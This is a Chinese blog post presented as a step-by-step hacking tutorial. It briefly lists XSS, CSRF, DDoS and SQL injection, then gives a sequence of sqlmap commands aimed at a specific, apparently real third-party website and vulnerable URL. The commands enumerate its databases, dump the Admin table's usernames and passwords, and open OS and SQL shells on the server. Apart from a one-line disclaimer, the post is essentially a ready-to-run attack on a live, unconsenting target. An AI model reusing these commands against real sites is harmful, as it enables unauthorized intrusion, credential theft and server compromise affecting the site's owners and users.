当前位置:首页 > 站长杂谈 > 正文内容

实战:【黑客技术】手把手教你如何攻击一个网站

小宝3周前 (11-09)站长杂谈110

好几天没有更新博客了,主要是博主没时间,白天要搬砖,又不想水文章,只想呈现满满的干货。今天带大家进入一个神秘领域,黑客的世界......

常见攻击手段

  • XSS攻击:利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序

  • CSRF攻击:跨站请求伪造,攻击者诱导受害者进入第三方网站,在第三方网站中,向被攻击网站发送跨站请求

  • DDOS攻击:通过大规模互联网流量淹没目标服务器或其周边基础设施,以破坏目标服务器、服务或网络正常流量的恶意行为

  • sql注入:将SQL代码添加到输入参数中,传递到服务器解析并执行的一种攻击手法

攻击工具

本篇只针对SQL注入攻击做实战演示,其他攻击手法以后博主有时间再写吧。所用工具:sqlmap,关于SQLMAP的介绍和安装我这里就不作更多的赘述了,感兴趣的朋友可以参考我之前写的:centos7 安装sqlmap及利用sqlmap 进行SQL注入详解 ,注:windows环境下也可安装sqlmap,自己百度下。

寻找靶机

寻找靶机这个多少碰点运气,因为现在开发人员对sql漏洞越来越重视,以及流行框架已经从底层给你规避了这种风险,已经很少网站存在sql注入漏洞了。但是,只要存在,这将是致命的。这里以【中国花炮网】:http://www.zghpw.com/  给大家做个演示。再次郑重申明:本篇内容仅供个人学习参考使用,恶意攻击是违法行为,由此引发的一切后果自行承担,与本站无关。

寻找注入点

输入以下代码,--dbs代表爆出该网站所有数据库,假如该链接存在sql注入漏洞,将会得到下图所示

python sqlmap.py -u "http://www.zghpw.com/ShowSd.asp?Infoid=1333" --dbs

202204201650440481576714.png 实战:【黑客技术】手把手教你如何攻击一个网站  黑客 第1张

该图给了我们如下信息:

操作系统:windows2019 or 2016 or 10

语言:asp,.net开发

数据库:sql server 2005

可用数据库:fireworknet、master、model、msdb、tempdb

寻找当前使用数据库

输入以下命令,寻找网站当前使用的数据库,这里就不贴图了,会返回 current database: 'fireworknet'

python sqlmap.py -u "http://www.zghpw.com/ShowSd.asp?Infoid=1333" --current-db

爆破数据表

通过上面的信息,我们已经找到网站所属数据库为:fireworknet,执行如下指令,爆出fireworknet数据库下所有表,将会得到下图所示:

python sqlmap.py -u "http://www.zghpw.com/ShowSd.asp?Infoid=1333" -D fireworknet --tables

202204201650441453393522.png 实战:【黑客技术】手把手教你如何攻击一个网站  黑客 第2张

通过上图信息我们可以知道fireworknet数据库下一共有31张表

爆破表字段

输入以下代码,爆破Admin表字段,将会得到下图所示

python sqlmap.py -u "http://www.zghpw.com/ShowSd.asp?Infoid=1333" -D fireworknet -T Admin --columns

202204201650441741866642.png 实战:【黑客技术】手把手教你如何攻击一个网站  黑客 第3张

通过上图信息我们可以了解到:fireworknet数据库下Admin表有8个字段

爆破表内容

输入以下代码,打印出Admin表,Admin_ID、Admin_Name、Admin_PWD字段,将会得到如下图所示。至此,从寻找sql漏洞到利用漏洞爆破数据库所有表数据完结......

python sqlmap.py -u "http://www.zghpw.com/ShowSd.asp?Infoid=1333" -D fireworknet -T Admin -C Admin_ID,Admin_Name,Admin_PWD --dump

202204201650442724468805.png 实战:【黑客技术】手把手教你如何攻击一个网站  黑客 第4张

进阶玩法

创建与系统交互的shell窗口

输入以下代码,将得到下图所示

python sqlmap.py -u "http://www.zghpw.com/ShowSd.asp?Infoid=1333" --os-shell

202204201650443529166616.png 实战:【黑客技术】手把手教你如何攻击一个网站  黑客 第5张

os-shell中比如输入ipconfig/all命令:(将会爆出服务器内网ip地址等信息)

202204201650443593539424.png 实战:【黑客技术】手把手教你如何攻击一个网站  黑客 第6张

创建SQL shell

输入如下命令,在sql-shell中输入:select * from Extend,将会得到下图所示

python sqlmap.py -u "http://www.zghpw.com/ShowSd.asp?Infoid=1333" --sql-shell

202204201650443942121201.png 实战:【黑客技术】手把手教你如何攻击一个网站  黑客 第7张



来源:勇康

扫描二维码推送至手机访问。

版权声明:本文由 会跑的菠萝 发布,如需转载请注明出处。

本文链接:https://boluobk.cn:443/post/219.html

标签: 黑客
分享给朋友:

相关文章

网站服务器选择Windows主机好还是Linux主机好?

从需求性、稳定性、操作性、安全性、性价比来分析一番,然后您就知道该选哪款空间了。需求性:这个要看您网站选取的语言,如果是asp建设的网站,毫不犹豫应该选择Windows主机,Linux不支持asp系列的语言;如果是PHP语言建设的网站,建议...

网站已安全运行X天X小时X分X秒

网站已安全运行X天X小时X分X秒

截止至现在本站已安全运行784天,还是和以前一样,就是人变懒了,代码都是以前的东西,css只是变颜色的可有可无,js自己找地方丢或一起放主题页脚文件即可,不懂留言~好久没发文章了,水一下。◕‿◕。代码一:本站已安全运行: <span...

绕过备案使用国内主机产品

绕过备案使用国内主机产品

使用国内主机需要备案,这确实比较麻烦,一备案就要等半个月,这里给大家分享两个免备案的方法方法一:使用81端口,81端口是不需要备案的,但是它的缺点就是需要在域名后面加:81才能正常访问方法二:使用国外机,国外机是不需要备案的,首先选择国外C...

kangle EP面板详细安装

kangle EP面板详细安装

前言现在大部分kangle脚本都有一键傻瓜安装功能,主要很多小白用户都是卡在安装之后需要设置的问题,我们这边就推荐4个脚本。至于怎么连接SSH这篇文章暂时先不说了。脚本推荐咖啡kangle (点击进入)首先我们先登录SSH 输入安装脚本命令...

科普VPS的线路:163、CN2、GTT、Telia等线路知识

163骨干网163骨干网也就是我们通常说的AS4134接入的带宽,是中国电信的骨干网,也就是我们经常看到202.97开头的路由,此网络负责了90%的电信业务负载(163有电信整个海外出口的90%带宽容量)。 目前直接和163有Peer比如...

zblog提示“授权文件非法“的终极解决办法

zblog提示“授权文件非法“的终极解决办法

最近一段时间有很多的用户遇到了这个“授权文件非法”的提示,这是由于zblog的应用中心插件调整了规则导致的。之前本站写过一篇“zblog报错“授权文件非法”的错误原因和解决办法”的文章,但是还是有用户反应按照教程操作了之后还是提示“授权文件...

评论列表

精英互联
精英互联 IP:重庆市
刚刚

感谢博主分享

dove
dove IP:重庆市
1秒前

非常不错,支持!

kis2
kis2 IP:重庆市
1秒前

写得很好,加油

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。